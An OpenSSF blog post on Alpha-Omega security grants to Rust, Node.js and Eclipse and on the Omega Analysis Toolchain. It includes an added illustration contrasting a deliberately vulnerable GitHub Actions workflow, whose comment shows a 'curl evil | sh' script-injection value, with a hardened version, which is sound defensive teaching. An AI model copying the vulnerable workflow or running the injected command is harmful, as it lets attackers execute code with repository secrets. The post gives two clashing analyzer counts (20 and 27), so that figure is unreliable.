By Michael Scovetta (Microsoft) and Michael Winser (Google)
As part of the OpenSSF’s continued investment in critical open-source projects, we are happy to announce new partnerships and tooling from the Alpha-Omega Project. Alpha-Omega will sponsor critical security work with a $460K grant to the Rust Foundation. This work expands on funding previously announced at OpenSSF Day in Austin earlier this year for the Python Software Foundation (PSF) and Eclipse Foundation, and for Node.js announced in April, bringing our total investment this year to over $1.5M. The Alpha-Omega team also recently released the initial version of the Omega Analysis Toolchain, which orchestrates over 20 different security analyzers to identify critical security vulnerabilities in open source packages.
New Rust Foundation Partnership
The Alpha-Omega team has reached an agreement with the Rust Foundation to sponsor critical security work with a $460K grant. The Rust Foundation is a nonprofit organization dedicated to supporting and sustaining the Rust programming language. These funds will be used to:
- Prepare a threat model of the Rust ecosystem.
- Assess the security of the Rust build/deployment infrastructure, and drive relevant improvements.
- Improve the security of Rust.
“The Rust Foundation is delighted to receive the support of OpenSSF and the Alpha-Omega Project to support its new Security Team,” says Bec Rumbul, Executive Director at the Rust Foundation. “This funding is kick-starting vital proactive work in the Rust ecosystem that will ensure that Rust continues to be a secure, safe and sustainable language for everyone.”
Node.js and Eclipse Foundation Partnership Updates
The open source software project Node.js is everywhere, and people put a lot of trust into the products and services that are built with Node.js. A $300K grant for Node.js has so far produced the following results:
- Improved the Node.js security release process.
- Triaged over 20 vulnerability reports and issued security fixes.
- Reactivated the Node.js security working group, which created a security and threat model for Node.js, an experimental permissions model for Node modules, and added automated vulnerability scanning to the Node.js CI.
The Eclipse Foundation provides its global community of individuals and organizations with a mature, scalable, and business-friendly environment for open source software collaboration and innovation. A $400K grant for Eclipse has so far produced the following results:
- Ran Scorecard against all Eclipse Foundation projects and analyzed the results.
- Identified dangerous workflows in a small number of repositories (fixes underway).
Plans are in progress to set organization-level token permissions to read-only by default (or help projects configure this themselves), configure Dependabot or Renovate in project repositories, enable tag protection for most repositories, and enable static analysis (CodeQL, SonarCloud, or Sonatype Lift).
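To make concrete what the Scorecard findings and the planned token-permission and Dependabot work above refer to, here is an added illustration; it is not code from the Eclipse Foundation's repositories or from Scorecard. The first workflow is a constructed example containing the patterns that Scorecard's Dangerous-Workflow and Token-Permissions checks report; the second is the hardened version, and the Dependabot configuration shows the kind of file the plan describes. Workflow names, the `build.sh` script and the Maven ecosystem are placeholders chosen for the example.

```yaml
# --- BEFORE: constructed workflow with the findings Scorecard reports ---
# 1. No top-level `permissions`, so GITHUB_TOKEN inherits the repository or
#    organization default, which may be read-write.
# 2. `pull_request_target` runs with the base repository's secrets, yet the
#    job checks out and executes code from the untrusted PR head.
# 3. An untrusted PR title is interpolated straight into a shell command
#    (script injection: a title like `"; curl evil | sh; echo "` runs as code).
name: ci-before
on:
  pull_request_target:
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - run: echo "Building ${{ github.event.pull_request.title }}"
      - run: ./build.sh          # placeholder build script
---
# --- AFTER: hardened version of the same workflow ---
# 1. Top-level `permissions: contents: read` scopes the token to read-only,
#    matching the read-only default the plan above describes.
# 2. Plain `pull_request` runs PR code without base-repository secrets.
# 3. Untrusted input is passed via an environment variable, so the shell
#    receives it as data and never parses it as part of the command.
name: ci-after
on:
  pull_request:
permissions:
  contents: read
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - env:
          PR_TITLE: ${{ github.event.pull_request.title }}
        run: echo "Building $PR_TITLE"
      - run: ./build.sh          # placeholder build script
---
# --- .github/dependabot.yml: keeps actions and dependencies current ---
# Ecosystem choice (maven) is an assumption for the example; pick the
# package-ecosystem values that match the repository.
version: 2
updates:
  - package-ecosystem: "github-actions"
    directory: "/"
    schedule:
      interval: "weekly"
  - package-ecosystem: "maven"
    directory: "/"
    schedule:
      interval: "weekly"
```

The three documents are separated with `---` only for presentation; in a repository each lives in its own file under `.github/workflows/` or `.github/`. Pinning actions to a commit SHA rather than a tag is a further Scorecard-recommended step not shown here.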
Releasing the Omega Analysis Toolchain
The Alpha-Omega team recently released the initial version of the Omega Analysis Toolchain, which orchestrates over 27 different security analyzers to identify critical security vulnerabilities in open source packages. Contributed to OpenSSF by Microsoft, this toolchain has been used to identify the vulnerabilities described in CVE-2022-32222 and CVE-2022-38018, and will be expanded and improved upon in the future. We’ve also used this toolchain to experiment with a “fully automated security review,” in collaboration with the OpenSSF Security Reviews project.
The Alpha-Omega Project is pleased to be able to build partnerships and support the work of many important open source security initiatives. The contributions and support of the developer community and member companies are what make OpenSSF such a success. Learn more about how you can join your industry peers in supporting OpenSSF by filling out this form, and an OpenSSF representative will be in touch with you. Individual contributors are also encouraged to join our efforts. See the many ways you can get involved in the OpenSSF.